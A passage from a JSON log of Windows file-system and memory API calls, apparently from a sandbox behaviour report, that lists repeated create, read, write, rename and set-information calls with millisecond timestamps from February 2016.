17:42:03,964", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,964", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,964", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,964", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,974", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,974", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,974", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,974", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,984", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,984", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,984", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,994", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,994", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,994", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,994", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,994", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,004", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,004", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,004", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,004", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,014", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,014", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,014", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,014", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,014", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,014", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,014", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,014", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,014", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,014", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,024", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,024", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,024", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,024", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,024", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,024", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,024", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,024", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,034", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,034", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,034", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,034", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,034", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,034", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,034", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,044", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,044", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,044", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,044", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,044", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,044", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,044", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,054", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,054", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,054", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,054", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,054", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,054", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,054", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,064", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,064", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,064", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,064", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,074", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,074", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,074", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,074", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,074", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,074", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,074", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,084", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,084", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,084", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,084", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,084", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,084", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,084", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,084", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,094", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,094", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,094", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,094", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,094", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,094", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,094", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,094", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,104", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,104", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,104", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,104", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,104", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,114", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,114", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,114", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,114", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,114", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,114", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,114", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,114", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,114", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,124", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,124", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,124", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,124", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,124", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,124", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,124", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,124", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,124", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,124", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,134", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,134", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,134", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,134", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,134", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,134", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,134", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,144", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,144", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,144", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,144", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,144", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,144", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,144", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,144", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,154", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,154", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,154", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,154", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,154", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,154", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,154", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,154", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,154", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,164", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,164", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,164", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,164", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,164", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,164", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,164", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,164", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,164", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,164", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,174", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,174", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,174", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,174", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,174", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,174", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,174", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,174", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,184", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,184", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,194", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,194", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,194", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,194", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,204", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,204", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,214", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,214", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,224", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,224", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,224", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,224", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,224", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,224", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,224", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,224", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,235", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,235", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,235", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,235", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,235", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,235", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,235", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,235", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,245", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,245", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,245", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,245", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,245", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,245", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,245", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,245", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,245", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,255", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,255", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,255", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,255", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,255", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,265", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,265", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,265", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,265", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,265", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,265", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,265", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,275", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,275", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,275", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,275", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,275", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,275", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,275", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,275", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,285", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,285", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,285", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,285", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,285", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,285", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,285", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,285", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,295", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,295", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,295", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,295", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,295", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,295", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,295", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,295", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,305", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,305", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,305", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,305", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,305", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,305", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,305", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,305", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,305", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,305", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,315", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,315", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,315", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,315", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,315", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,315", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,315", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,315", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,315", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,325", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,325", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,325", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,325", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,325", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,325", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,325", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,325", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,325", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,345", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,345", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,345", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,345", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,345", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,345", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,355", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,355", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,355", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,355", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,355", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,355", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,355", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,355", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,355", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,355", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,365", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,375", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,375", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,385", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,385", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,395", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,395", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,395", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,405", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,405", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,805", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,805", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,815", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,815", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,815", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,815", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,815", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,815", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,815", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,815", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,815", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,815", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,825", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,825", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,825", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,825", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,825", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,825", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,825", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,825", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,835", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,835", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,835", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,835", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,835", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,845", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,845", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,845", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,845", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,845", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,845", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,845", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,845", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,855", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,855", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,855", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,855", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,855", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,855", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,855", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,855", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,865", "api": 